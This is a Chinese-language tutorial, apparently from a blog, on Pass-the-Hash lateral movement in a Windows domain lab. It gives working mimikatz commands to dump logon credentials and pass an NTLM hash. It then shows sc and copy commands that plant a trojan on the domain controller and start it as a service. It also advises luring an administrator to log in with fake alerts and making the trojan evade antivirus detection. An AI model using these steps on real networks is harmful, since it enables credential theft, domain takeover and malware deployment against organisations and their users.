哈希传递攻击

哈希传递攻击

Scroll Down

一、背景:

内网渗透过程中,当获取到某个管理员用户的密码 hash 值却无法解密时,可以通过哈希传递攻击(Pass The Hash)对内网其他机器进行横向渗透。

二、使用:

1、测试环境

  • 域信息:
    • 域名:tech.com
    • 主域控(PDC):192.168.30.149
  • 拿下一台域内设备,并通过本地提权到管理权限
    • mimikatz需要使用管理员权限才能运行

image-20230130103733545

  • 管理账户登录过该靶机

    • 未登录可以采用制造告警来引诱管理员登录该设备解决问题,从而捕获到该管理员的账户信息
  • 两个域管理员账户:administrator / test

    • 判断命令:net group "domain admins" /domain
    • 释义:获取域内所有属于管理组的账户昵称

image-20230130102636414

2、攻击测试

  • mimikatz:下载
  • 注:mimikatz需要使用管理员权限执行!
  • 获取账户的密码或哈希
    • mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit"

image-20230130104932772

  • 进行传递hash攻击
    • mimikatz "privilege::debug" "sekurlsa::pth /user:test /domain:tech.com /ntlm:224b59e0267ee26ca2313c1d2"
    • 注:个人测试请修改 user、domain、ntlm对应信息!

image-20230130105559738

3、上传木马

  • copy artifact.exe \\192.168.30.149\c$
    • 将 artifact.exe 复制到域控主机上

image-20230130110421510

4、启动木马

  • sc \\192.168.30.149 create shell binpath= "c:\artifact.exe"
    • 在主域控上创建服务,执行木马程序(仅创建,不启动)
  • sc \\192.168.30.149 start shell
    • 在主域控上启动先前创建的木马服务

5、结果

  • 通过于PDC(主域控)执行SC命令,成功上传并运行了木马,获取到了域控的最高权限!
  • 注意:在上传木马之前,请一定做临时免杀处理!

image-20230130101644119

三、参考资料: